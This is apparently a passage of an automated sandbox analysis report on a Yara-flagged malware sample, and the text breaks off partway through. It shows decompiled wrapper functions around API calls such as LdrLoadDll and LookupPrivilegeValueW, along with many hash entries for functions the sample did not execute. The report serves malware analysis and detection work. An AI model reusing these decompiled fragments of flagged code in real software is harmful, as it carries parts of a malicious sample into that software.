                                                0x0040acef

                                                APIs
                                                • LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 0040AD62
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.461861564.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                Yara matches
                                                Similarity
                                                • API ID: Load
                                                • String ID:
                                                • API String ID: 2234796835-0
                                                • Opcode ID: ac607fe8fadfd29998aeae0fc689f596357b97b0bf363d8ae678b1bbacd093b8
                                                • Instruction ID: 2939d7c89a7172a658210ab68ef3fead8153cd52e8a31b6efd872631f279e96f
                                                • Opcode Fuzzy Hash: ac607fe8fadfd29998aeae0fc689f596357b97b0bf363d8ae678b1bbacd093b8
                                                • Instruction Fuzzy Hash: 24F06875E4020DABDF10DB95DC82FD9B378AF48308F0081A6E91D9B681F630DA59CB92
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 64%
                                                			E0041A7C2(signed int __eax, void* __ebx, void* __ecx, intOrPtr _a4, WCHAR* _a8, WCHAR* _a12, struct _LUID* _a16) {
                                                				int _t13;
                                                				void* _t21;
                                                
                                                				asm("les esi, [edx]");
                                                				asm("lds esi, [0x769869b8]");
                                                				 *(__ecx + 0x55197a7f) =  *(__ecx + 0x55197a7f) | __eax;
                                                				_t10 = _a4;
                                                				E0041AF60(_t21, _a4, _a4 + 0xc8c,  *((intOrPtr*)(_t10 + 0xa18)), 0, 0x46);
                                                				_t13 = LookupPrivilegeValueW(_a8, _a12, _a16); // executed
                                                				return _t13;
                                                			}
                                                0x0041a7c2
                                                0x0041a7c5
                                                0x0041a7cb
                                                0x0041a7d3
                                                0x0041a7ea
                                                0x0041a800
                                                0x0041a804

                                                APIs
                                                • LookupPrivilegeValueW.ADVAPI32(00000000,0000003C,0040F1D2,0040F1D2,0000003C,00000000,?,00409D65), ref: 0041A800
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.461861564.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                Yara matches
                                                Similarity
                                                • API ID: LookupPrivilegeValue
                                                • String ID:
                                                • API String ID: 3899507212-0
                                                • Opcode ID: 5293b461ac1da1569b82276833f07d95cefbcf7da94b6f4b372471dededb407f
                                                • Instruction ID: 691f3f98cb7d57195190baae01592f46005a8642ef15458af35efcd506b53531
                                                • Opcode Fuzzy Hash: 5293b461ac1da1569b82276833f07d95cefbcf7da94b6f4b372471dededb407f
                                                • Instruction Fuzzy Hash: 64F0A0B2600218ABDB14DF44CC40ED73768EF49310F258154FD086B242C631ED16CBE1
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 100%
                                                			E0041A670(intOrPtr _a4, void* _a8, long _a12, void* _a16) {
                                                				char _t10;
                                                				void* _t15;
                                                
                                                				_t3 = _a4 + 0xc74; // 0xc74
                                                				E0041AF60(_t15, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x35);
                                                				_t10 = RtlFreeHeap(_a8, _a12, _a16); // executed
                                                				return _t10;
                                                			}
                                                0x0041a67f
                                                0x0041a687
                                                0x0041a69d
                                                0x0041a6a1

                                                APIs
                                                • RtlFreeHeap.NTDLL(00000060,00409CF3,?,?,00409CF3,00000060,00000000,00000000,?,?,00409CF3,?,00000000), ref: 0041A69D
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.461861564.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                Yara matches
                                                Similarity
                                                • API ID: FreeHeap
                                                • String ID:
                                                • API String ID: 3298025750-0
                                                • Opcode ID: c73a038728a0c461ae7389dd2c659cb336152b082840842379cc140023e4f07c
                                                • Instruction ID: 086aab0bc8c344d6c60c9bbd5a0512cabfd8005857d16272e4a7e29987098a06
                                                • Opcode Fuzzy Hash: c73a038728a0c461ae7389dd2c659cb336152b082840842379cc140023e4f07c
                                                • Instruction Fuzzy Hash: C1E012B1200208ABDB18EF99CC49EA777ACEF88764F118559BA085B242C630E9108AB0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 100%
                                                			E0041A7D0(intOrPtr _a4, WCHAR* _a8, WCHAR* _a12, struct _LUID* _a16) {
                                                				int _t10;
                                                				void* _t15;
                                                
                                                				E0041AF60(_t15, _a4, _a4 + 0xc8c,  *((intOrPtr*)(_a4 + 0xa18)), 0, 0x46);
                                                				_t10 = LookupPrivilegeValueW(_a8, _a12, _a16); // executed
                                                				return _t10;
                                                			}
                                                0x0041a7ea
                                                0x0041a800
                                                0x0041a804

                                                APIs
                                                • LookupPrivilegeValueW.ADVAPI32(00000000,0000003C,0040F1D2,0040F1D2,0000003C,00000000,?,00409D65), ref: 0041A800
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.461861564.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                Yara matches
                                                Similarity
                                                • API ID: LookupPrivilegeValue
                                                • String ID:
                                                • API String ID: 3899507212-0
                                                • Opcode ID: 6066231f07dbbfb97dda43844c8c8cc76a5ad0e3334111b5d8a4297bdf0bdfe7
                                                • Instruction ID: 3f9aab8e47c10174471559fee5d267dc63a882ce56825bdd12c8e63267ac542a
                                                • Opcode Fuzzy Hash: 6066231f07dbbfb97dda43844c8c8cc76a5ad0e3334111b5d8a4297bdf0bdfe7
                                                • Instruction Fuzzy Hash: 23E01AB12002086BDB10DF49CC85EE737ADEF88654F118155BA0C57241C934E8118BF5
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 100%
                                                			E0041A6B0(intOrPtr _a4, int _a8) {
                                                				void* _t10;
                                                
                                                				_t5 = _a4;
                                                				E0041AF60(_t10, _a4, _a4 + 0xc7c,  *((intOrPtr*)(_t5 + 0xa14)), 0, 0x36);
                                                				ExitProcess(_a8);
                                                			}
                                                0x0041a6b3
                                                0x0041a6ca
                                                0x0041a6d8

                                                APIs
                                                • ExitProcess.KERNELBASE(?,?,00000000,?,?,?), ref: 0041A6D8
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.461861564.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                Yara matches
                                                Similarity
                                                • API ID: ExitProcess
                                                • String ID:
                                                • API String ID: 621844428-0
                                                • Opcode ID: caa18f4ccbf82a939ed7a560578cfa8cb4ed60065234b72d20cd43f227523b36
                                                • Instruction ID: 671013aba82168957284564a3a9f05bc2528e3e40ec9789e05460755300894f7
                                                • Opcode Fuzzy Hash: caa18f4ccbf82a939ed7a560578cfa8cb4ed60065234b72d20cd43f227523b36
                                                • Instruction Fuzzy Hash: 68D017726002187BD620EB99CC85FD777ACDF48BA4F1580A9BA1C6B242C531BA108AE1
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Non-executed Functions

                                                Memory Dump Source
                                                • Source File: 00000005.00000002.462096989.0000000000950000.00000040.00000001.sdmp, Offset: 00940000, based on PE: true
                                                • Associated: 00000005.00000002.462086313.0000000000940000.00000040.00000001.sdmp
                                                • Associated: 00000005.00000002.462196280.0000000000A30000.00000040.00000001.sdmp
                                                • Associated: 00000005.00000002.462209254.0000000000A40000.00000040.00000001.sdmp
                                                • Associated: 00000005.00000002.462218698.0000000000A44000.00000040.00000001.sdmp
                                                • Associated: 00000005.00000002.462224641.0000000000A47000.00000040.00000001.sdmp
                                                • Associated: 00000005.00000002.462233009.0000000000A50000.00000040.00000001.sdmp
                                                • Associated: 00000005.00000002.462274748.0000000000AB0000.00000040.00000001.sdmp
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: befe73b4781d6967e22b7a2d8b560eb031a7a61a4f73831a88057bacb28cb109
                                                • Instruction ID: 76f608394c17b2da61c0e60d7b396822e6560d31d6cc7678428f468fa45b9427
                                                • Opcode Fuzzy Hash: befe73b4781d6967e22b7a2d8b560eb031a7a61a4f73831a88057bacb28cb109
                                                • Instruction Fuzzy Hash: 4DF0C222338559EBDB4CEB189E5176A33D9EBD4300F54C479ED4DCB251E635FE408290
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000005.00000002.462096989.0000000000950000.00000040.00000001.sdmp, Offset: 00940000, based on PE: true
                                                • Associated: 00000005.00000002.462086313.0000000000940000.00000040.00000001.sdmp
                                                • Associated: 00000005.00000002.462196280.0000000000A30000.00000040.00000001.sdmp
                                                • Associated: 00000005.00000002.462209254.0000000000A40000.00000040.00000001.sdmp
                                                • Associated: 00000005.00000002.462218698.0000000000A44000.00000040.00000001.sdmp
                                                • Associated: 00000005.00000002.462224641.0000000000A47000.00000040.00000001.sdmp
                                                • Associated: 00000005.00000002.462233009.0000000000A50000.00000040.00000001.sdmp
                                                • Associated: 00000005.00000002.462274748.0000000000AB0000.00000040.00000001.sdmp
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: ac83c10758ebe8d5f76978585b10c9c6dce2ba331d146511a487ba092cee0476
                                                • Instruction ID: b97e0867cf63cce6a7bd091cca7d2f61d4937398616a74d9d7050cc2a0bd1794
                                                • Opcode Fuzzy Hash: ac83c10758ebe8d5f76978585b10c9c6dce2ba331d146511a487ba092cee0476
                                                • Instruction Fuzzy Hash: E8B01272180540CBE3199718E906F5FB710FB90F00F00C93EA00781C50DA389D3CD446
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000005.00000002.462096989.0000000000950000.00000040.00000001.sdmp, Offset: 00940000, based on PE: true
                                                • Associated: 00000005.00000002.462086313.0000000000940000.00000040.00000001.sdmp
                                                • Associated: 00000005.00000002.462196280.0000000000A30000.00000040.00000001.sdmp
                                                • Associated: 00000005.00000002.462209254.0000000000A40000.00000040.00000001.sdmp
                                                • Associated: 00000005.00000002.462218698.0000000000A44000.00000040.00000001.sdmp
                                                • Associated: 00000005.00000002.462224641.0000000000A47000.00000040.00000001.sdmp
                                                • Associated: 00000005.00000002.462233009.0000000000A50000.00000040.00000001.sdmp
                                                • Associated: 00000005.00000002.462274748.0000000000AB0000.00000040.00000001.sdmp
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 4c5d85a427470f550e29695eb19de3105b1c03314207db60bf040a26eb212f22
                                                • Instruction ID: 5a023e870da9c1ddb48dfa425d4b1b106951aaa9a6b60f468992a3f00291b547
                                                • Opcode Fuzzy Hash: 4c5d85a427470f550e29695eb19de3105b1c03314207db60bf040a26eb212f22
                                                • Instruction Fuzzy Hash: 5CB012B2100580C7E30D9714DD06B4B7210FB80F00F00893AA10B81861DB7C9A2CD45E
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000005.00000002.462096989.0000000000950000.00000040.00000001.sdmp, Offset: 00940000, based on PE: true
                                                • Associated: 00000005.00000002.462086313.0000000000940000.00000040.00000001.sdmp
                                                • Associated: 00000005.00000002.462196280.0000000000A30000.00000040.00000001.sdmp
                                                • Associated: 00000005.00000002.462209254.0000000000A40000.00000040.00000001.sdmp
                                                • Associated: 00000005.00000002.462218698.0000000000A44000.00000040.00000001.sdmp
                                                • Associated: 00000005.00000002.462224641.0000000000A47000.00000040.00000001.sdmp
                                                • Associated: 00000005.00000002.462233009.0000000000A50000.00000040.00000001.sdmp
                                                • Associated: 00000005.00000002.462274748.0000000000AB0000.00000040.00000001.sdmp
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 8778145c82cc07ced6a03fc17a8dcea4f431f55768a4b0417211ed07bf4591cb
                                                • Instruction ID: 018f436d7687ff9142db90ebed9d2f0c0dfd000868ccafab48d689f3c6447ef1
                                                • Opcode Fuzzy Hash: 8778145c82cc07ced6a03fc17a8dcea4f431f55768a4b0417211ed07bf4591cb
                                                • Instruction Fuzzy Hash: B2B01272100940C7E359A714ED46B4B7210FB80F01F00C93BA01B81851DB38AA3CDD96
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000005.00000002.462096989.0000000000950000.00000040.00000001.sdmp, Offset: 00940000, based on PE: true
                                                • Associated: 00000005.00000002.462086313.0000000000940000.00000040.00000001.sdmp
                                                • Associated: 00000005.00000002.462196280.0000000000A30000.00000040.00000001.sdmp
                                                • Associated: 00000005.00000002.462209254.0000000000A40000.00000040.00000001.sdmp
                                                • Associated: 00000005.00000002.462218698.0000000000A44000.00000040.00000001.sdmp
                                                • Associated: 00000005.00000002.462224641.0000000000A47000.00000040.00000001.sdmp
                                                • Associated: 00000005.00000002.462233009.0000000000A50000.00000040.00000001.sdmp
                                                • Associated: 00000005.00000002.462274748.0000000000AB0000.00000040.00000001.sdmp
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: ee2127f5049c20af2db79b3523ae30c516210f3a5483c1737df9ea5d0a06ca55
                                                • Instruction ID: 6f78205b53d22ab4e8c81d7e3ead40d6172b524c4c965a7ad5e52c730ffb8076
                                                • Opcode Fuzzy Hash: ee2127f5049c20af2db79b3523ae30c516210f3a5483c1737df9ea5d0a06ca55
                                                • Instruction Fuzzy Hash: B8B01273104D40C7E3099714DD16F4FB310FB90F02F00893EA00B81850DA38A92CC846
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000005.00000002.462096989.0000000000950000.00000040.00000001.sdmp, Offset: 00940000, based on PE: true
                                                 • Associated: 00000005.00000002.462086313.0000000000940000.00000040.00000001.sdmp
                                                 • Associated: 00000005.00000002.462196280.0000000000A30000.00000040.00000001.sdmp
                                                 • Associated: 00000005.00000002.462209254.0000000000A40000.00000040.00000001.sdmp
                                                 • Associated: 00000005.00000002.462218698.0000000000A44000.00000040.00000001.sdmp
                                                 • Associated: 00000005.00000002.462224641.0000000000A47000.00000040.00000001.sdmp
                                                 • Associated: 00000005.00000002.462233009.0000000000A50000.00000040.00000001.sdmp
                                                 • Associated: 00000005.00000002.462274748.0000000000AB0000.00000040.00000001.sdmp
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: a1a4eb0b16b3dbbf7110758f456c9aa6f179838dd1f90225a28a8369ad29a59d
                                                • Instruction ID: 165250f8074bc0ef9cdc504fa449021ea13c8322197c03fc884fef66fc1cad38
                                                • Opcode Fuzzy Hash: a1a4eb0b16b3dbbf7110758f456c9aa6f179838dd1f90225a28a8369ad29a59d
                                                • Instruction Fuzzy Hash: 23B01272140580C7E31D9718D906B5B7610FB80F00F008D3AA04781CA1DBB89A2CE44A
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000005.00000002.462096989.0000000000950000.00000040.00000001.sdmp, Offset: 00940000, based on PE: true
                                                 • Associated: 00000005.00000002.462086313.0000000000940000.00000040.00000001.sdmp
                                                 • Associated: 00000005.00000002.462196280.0000000000A30000.00000040.00000001.sdmp
                                                 • Associated: 00000005.00000002.462209254.0000000000A40000.00000040.00000001.sdmp
                                                 • Associated: 00000005.00000002.462218698.0000000000A44000.00000040.00000001.sdmp
                                                 • Associated: 00000005.00000002.462224641.0000000000A47000.00000040.00000001.sdmp
                                                 • Associated: 00000005.00000002.462233009.0000000000A50000.00000040.00000001.sdmp
                                                 • Associated: 00000005.00000002.462274748.0000000000AB0000.00000040.00000001.sdmp
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 154562b1c1044579d2961e918a12e94c940bf0a0b9e8e44222bba29e99ad0489
                                                • Instruction ID: cdb92b4df541c6703467cf01e2fb590a315ac15b2f911c24ec3250dccee83ae6
                                                • Opcode Fuzzy Hash: 154562b1c1044579d2961e918a12e94c940bf0a0b9e8e44222bba29e99ad0489
                                                • Instruction Fuzzy Hash: 64B01272200540C7E3099724D906B4B7310FB80F00F008D3AE04781892DB78992CD487
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000005.00000002.462096989.0000000000950000.00000040.00000001.sdmp, Offset: 00940000, based on PE: true
                                                 • Associated: 00000005.00000002.462086313.0000000000940000.00000040.00000001.sdmp
                                                 • Associated: 00000005.00000002.462196280.0000000000A30000.00000040.00000001.sdmp
                                                 • Associated: 00000005.00000002.462209254.0000000000A40000.00000040.00000001.sdmp
                                                 • Associated: 00000005.00000002.462218698.0000000000A44000.00000040.00000001.sdmp
                                                 • Associated: 00000005.00000002.462224641.0000000000A47000.00000040.00000001.sdmp
                                                 • Associated: 00000005.00000002.462233009.0000000000A50000.00000040.00000001.sdmp
                                                 • Associated: 00000005.00000002.462274748.0000000000AB0000.00000040.00000001.sdmp
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 33242f20aaab27225aff268df6c25d5fe4c2b5540d13ace685107ef1cdf40795
                                                • Instruction ID: b608c8617bc096b37df9be2f0bc93e64f466faa20b7dbfb3ee59c54b4bfc8c85
                                                • Opcode Fuzzy Hash: 33242f20aaab27225aff268df6c25d5fe4c2b5540d13ace685107ef1cdf40795
                                                • Instruction Fuzzy Hash: EBB01275100540C7F304D704D905F4AB311FBD0F04F40893AE40786591D77EAD28C697
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000005.00000002.462096989.0000000000950000.00000040.00000001.sdmp, Offset: 00940000, based on PE: true
                                                 • Associated: 00000005.00000002.462086313.0000000000940000.00000040.00000001.sdmp
                                                 • Associated: 00000005.00000002.462196280.0000000000A30000.00000040.00000001.sdmp
                                                 • Associated: 00000005.00000002.462209254.0000000000A40000.00000040.00000001.sdmp
                                                 • Associated: 00000005.00000002.462218698.0000000000A44000.00000040.00000001.sdmp
                                                 • Associated: 00000005.00000002.462224641.0000000000A47000.00000040.00000001.sdmp
                                                 • Associated: 00000005.00000002.462233009.0000000000A50000.00000040.00000001.sdmp
                                                 • Associated: 00000005.00000002.462274748.0000000000AB0000.00000040.00000001.sdmp
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 24bb0b37ea7353fce174200a7558970e7d293f02c0796de48d820b1db3e8008e
                                                • Instruction ID: 3aeeca65ea1aaf37b62c9893cb2d02334d47a3b29990fed3fb0e6cbc500f1d8d
                                                • Opcode Fuzzy Hash: 24bb0b37ea7353fce174200a7558970e7d293f02c0796de48d820b1db3e8008e
                                                • Instruction Fuzzy Hash: 52B01272100940C7E34AA714DE07B8BB210FBD0F01F00893BA04B85D50D638A92CC546
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000005.00000002.462096989.0000000000950000.00000040.00000001.sdmp, Offset: 00940000, based on PE: true
                                                 • Associated: 00000005.00000002.462086313.0000000000940000.00000040.00000001.sdmp
                                                 • Associated: 00000005.00000002.462196280.0000000000A30000.00000040.00000001.sdmp
                                                 • Associated: 00000005.00000002.462209254.0000000000A40000.00000040.00000001.sdmp
                                                 • Associated: 00000005.00000002.462218698.0000000000A44000.00000040.00000001.sdmp
                                                 • Associated: 00000005.00000002.462224641.0000000000A47000.00000040.00000001.sdmp
                                                 • Associated: 00000005.00000002.462233009.0000000000A50000.00000040.00000001.sdmp
                                                 • Associated: 00000005.00000002.462274748.0000000000AB0000.00000040.00000001.sdmp
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 4f2cab816673a0835cc858cab12777882f58cc76e03a07139f76655cd686d1a0
                                                • Instruction ID: d523cc507bde657408e54325c2dcaf12b60df831943b7985b4c6fe4931788f26
                                                • Opcode Fuzzy Hash: 4f2cab816673a0835cc858cab12777882f58cc76e03a07139f76655cd686d1a0
                                                • Instruction Fuzzy Hash: FCB0927220194087E2099B04D905B477251EBC0B01F408934A50646590DB399928D947
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000005.00000002.462096989.0000000000950000.00000040.00000001.sdmp, Offset: 00940000, based on PE: true
                                                 • Associated: 00000005.00000002.462086313.0000000000940000.00000040.00000001.sdmp
                                                 • Associated: 00000005.00000002.462196280.0000000000A30000.00000040.00000001.sdmp
                                                 • Associated: 00000005.00000002.462209254.0000000000A40000.00000040.00000001.sdmp
                                                 • Associated: 00000005.00000002.462218698.0000000000A44000.00000040.00000001.sdmp
                                                 • Associated: 00000005.00000002.462224641.0000000000A47000.00000040.00000001.sdmp
                                                 • Associated: 00000005.00000002.462233009.0000000000A50000.00000040.00000001.sdmp
                                                 • Associated: 00000005.00000002.462274748.0000000000AB0000.00000040.00000001.sdmp
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 8f0c591c5e21216b00dee0cfdb8398dd80d2c6f9bc4c445cb98f30dfaa3fa1de
                                                • Instruction ID: c22cab920426f99211259bec297b66dc94c7f77789dfa39603ac798b5fdced38
                                                • Opcode Fuzzy Hash: 8f0c591c5e21216b00dee0cfdb8398dd80d2c6f9bc4c445cb98f30dfaa3fa1de
                                                • Instruction Fuzzy Hash: 66B01272100544C7E349B714D906B8B7210FF80F00F00893AA00782861DB389A2CE996
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000005.00000002.462096989.0000000000950000.00000040.00000001.sdmp, Offset: 00940000, based on PE: true
                                                 • Associated: 00000005.00000002.462086313.0000000000940000.00000040.00000001.sdmp
                                                 • Associated: 00000005.00000002.462196280.0000000000A30000.00000040.00000001.sdmp
                                                 • Associated: 00000005.00000002.462209254.0000000000A40000.00000040.00000001.sdmp
                                                 • Associated: 00000005.00000002.462218698.0000000000A44000.00000040.00000001.sdmp
                                                 • Associated: 00000005.00000002.462224641.0000000000A47000.00000040.00000001.sdmp
                                                 • Associated: 00000005.00000002.462233009.0000000000A50000.00000040.00000001.sdmp
                                                 • Associated: 00000005.00000002.462274748.0000000000AB0000.00000040.00000001.sdmp
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: dd081996be218738afd9aebd029b97e59d15eb89e01646829fdeee62bde327fa
                                                • Instruction ID: 9b5f4fb9875c6876c932e4128e9800c708acc4d40f0b969179b44b3e8b2884d0
                                                • Opcode Fuzzy Hash: dd081996be218738afd9aebd029b97e59d15eb89e01646829fdeee62bde327fa
                                                • Instruction Fuzzy Hash: 4FB01272100580C7E30D9714D90AB4B7210FB80F00F00CD3AA00781861DB78DA2CD45A
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000005.00000002.462096989.0000000000950000.00000040.00000001.sdmp, Offset: 00940000, based on PE: true
                                                 • Associated: 00000005.00000002.462086313.0000000000940000.00000040.00000001.sdmp
                                                 • Associated: 00000005.00000002.462196280.0000000000A30000.00000040.00000001.sdmp
                                                 • Associated: 00000005.00000002.462209254.0000000000A40000.00000040.00000001.sdmp
                                                 • Associated: 00000005.00000002.462218698.0000000000A44000.00000040.00000001.sdmp
                                                 • Associated: 00000005.00000002.462224641.0000000000A47000.00000040.00000001.sdmp
                                                 • Associated: 00000005.00000002.462233009.0000000000A50000.00000040.00000001.sdmp
                                                 • Associated: 00000005.00000002.462274748.0000000000AB0000.00000040.00000001.sdmp
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: a404d463d6f8697e12459a80a2071a15e1bd5ec6cf7fed7c99dd07a5c51de8f6
                                                • Instruction ID: 2cae8b11bd858d750de1a79d340ce6dfe3ec44f87311ce0e8d0be64a47f0ebf6
                                                • Opcode Fuzzy Hash: a404d463d6f8697e12459a80a2071a15e1bd5ec6cf7fed7c99dd07a5c51de8f6
                                                • Instruction Fuzzy Hash: 9BB01272100544C7E349A714DA07B8B7210FB80F00F008D3BA04782851DFB89A2CE986
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000005.00000002.462096989.0000000000950000.00000040.00000001.sdmp, Offset: 00940000, based on PE: true
                                                 • Associated: 00000005.00000002.462086313.0000000000940000.00000040.00000001.sdmp
                                                 • Associated: 00000005.00000002.462196280.0000000000A30000.00000040.00000001.sdmp
                                                 • Associated: 00000005.00000002.462209254.0000000000A40000.00000040.00000001.sdmp
                                                 • Associated: 00000005.00000002.462218698.0000000000A44000.00000040.00000001.sdmp
                                                 • Associated: 00000005.00000002.462224641.0000000000A47000.00000040.00000001.sdmp
                                                 • Associated: 00000005.00000002.462233009.0000000000A50000.00000040.00000001.sdmp
                                                 • Associated: 00000005.00000002.462274748.0000000000AB0000.00000040.00000001.sdmp
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: c324cfac0bc47b069c1788d5b946c83edf7c28d4d9dcf1ed0d5a02e7884c4d21
                                                • Instruction ID: 9452a8d0b0f104eb9e4922b1c8778681c83a3ee0f3d85b1ffb0a7dc5c1b1eaf2
                                                • Opcode Fuzzy Hash: c324cfac0bc47b069c1788d5b946c83edf7c28d4d9dcf1ed0d5a02e7884c4d21
                                                • Instruction Fuzzy Hash: 9AB01272100640C7E349A714DA0BB5B7210FB80F00F00893BE00781852DF389A2CD986
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000005.00000002.462096989.0000000000950000.00000040.00000001.sdmp, Offset: 00940000, based on PE: true
                                                 • Associated: 00000005.00000002.462086313.0000000000940000.00000040.00000001.sdmp
                                                 • Associated: 00000005.00000002.462196280.0000000000A30000.00000040.00000001.sdmp
                                                 • Associated: 00000005.00000002.462209254.0000000000A40000.00000040.00000001.sdmp
                                                 • Associated: 00000005.00000002.462218698.0000000000A44000.00000040.00000001.sdmp
                                                 • Associated: 00000005.00000002.462224641.0000000000A47000.00000040.00000001.sdmp
                                                 • Associated: 00000005.00000002.462233009.0000000000A50000.00000040.00000001.sdmp
                                                 • Associated: 00000005.00000002.462274748.0000000000AB0000.00000040.00000001.sdmp
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 445a353fbf322f74478a6659fdc04cf8623378f6e443218e16a25411f5af12d5
                                                • Instruction ID: 24e1bc86294fbd7a1654c33a96a754a721993c998c3fcb69f8e89524a52cb594
                                                • Opcode Fuzzy Hash: 445a353fbf322f74478a6659fdc04cf8623378f6e443218e16a25411f5af12d5
                                                • Instruction Fuzzy Hash: 54B01272201544C7E3099B14D906F8B7210FB90F00F00893EE00782851DB38D92CE447
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000005.00000002.462096989.0000000000950000.00000040.00000001.sdmp, Offset: 00940000, based on PE: true
                                                 • Associated: 00000005.00000002.462086313.0000000000940000.00000040.00000001.sdmp
                                                 • Associated: 00000005.00000002.462196280.0000000000A30000.00000040.00000001.sdmp
                                                 • Associated: 00000005.00000002.462209254.0000000000A40000.00000040.00000001.sdmp
                                                 • Associated: 00000005.00000002.462218698.0000000000A44000.00000040.00000001.sdmp
                                                 • Associated: 00000005.00000002.462224641.0000000000A47000.00000040.00000001.sdmp
                                                 • Associated: 00000005.00000002.462233009.0000000000A50000.00000040.00000001.sdmp
                                                 • Associated: 00000005.00000002.462274748.0000000000AB0000.00000040.00000001.sdmp
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 5d06e62ecc0ccff2d82fb33389f73f013fdf3a2f5ea46d36b3417402e9c0144c
                                                • Instruction ID: bea31e52b4947098166a5853b381437c0ce687cada8622438d1654f6fc3cd67c
                                                • Opcode Fuzzy Hash: 5d06e62ecc0ccff2d82fb33389f73f013fdf3a2f5ea46d36b3417402e9c0144c
                                                • Instruction Fuzzy Hash: B2B01272140540C7E3099714DA1AB5B7210FB80F00F008D3AE04781891DB7C9A2CD486
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000005.00000002.462096989.0000000000950000.00000040.00000001.sdmp, Offset: 00940000, based on PE: true
                                                 • Associated: 00000005.00000002.462086313.0000000000940000.00000040.00000001.sdmp
                                                 • Associated: 00000005.00000002.462196280.0000000000A30000.00000040.00000001.sdmp
                                                 • Associated: 00000005.00000002.462209254.0000000000A40000.00000040.00000001.sdmp
                                                 • Associated: 00000005.00000002.462218698.0000000000A44000.00000040.00000001.sdmp
                                                 • Associated: 00000005.00000002.462224641.0000000000A47000.00000040.00000001.sdmp
                                                 • Associated: 00000005.00000002.462233009.0000000000A50000.00000040.00000001.sdmp
                                                 • Associated: 00000005.00000002.462274748.0000000000AB0000.00000040.00000001.sdmp
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: f629700e8a0faf16c3a99a987d81dda9b9e9a08178d0ad03aaec4005a132e95a
                                                • Instruction ID: df3521920546c87a7cfa40f03b9d1cb3325e43f750a27356a7d3e25b902d3ed9
                                                • Opcode Fuzzy Hash: f629700e8a0faf16c3a99a987d81dda9b9e9a08178d0ad03aaec4005a132e95a
                                                • Instruction Fuzzy Hash: FAB01272201540C7F349A714D946F5BB210FB90F04F008A3AE04782850DA38992CC547
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000005.00000002.462096989.0000000000950000.00000040.00000001.sdmp, Offset: 00940000, based on PE: true
                                                 • Associated: 00000005.00000002.462086313.0000000000940000.00000040.00000001.sdmp
                                                 • Associated: 00000005.00000002.462196280.0000000000A30000.00000040.00000001.sdmp
                                                 • Associated: 00000005.00000002.462209254.0000000000A40000.00000040.00000001.sdmp
                                                 • Associated: 00000005.00000002.462218698.0000000000A44000.00000040.00000001.sdmp
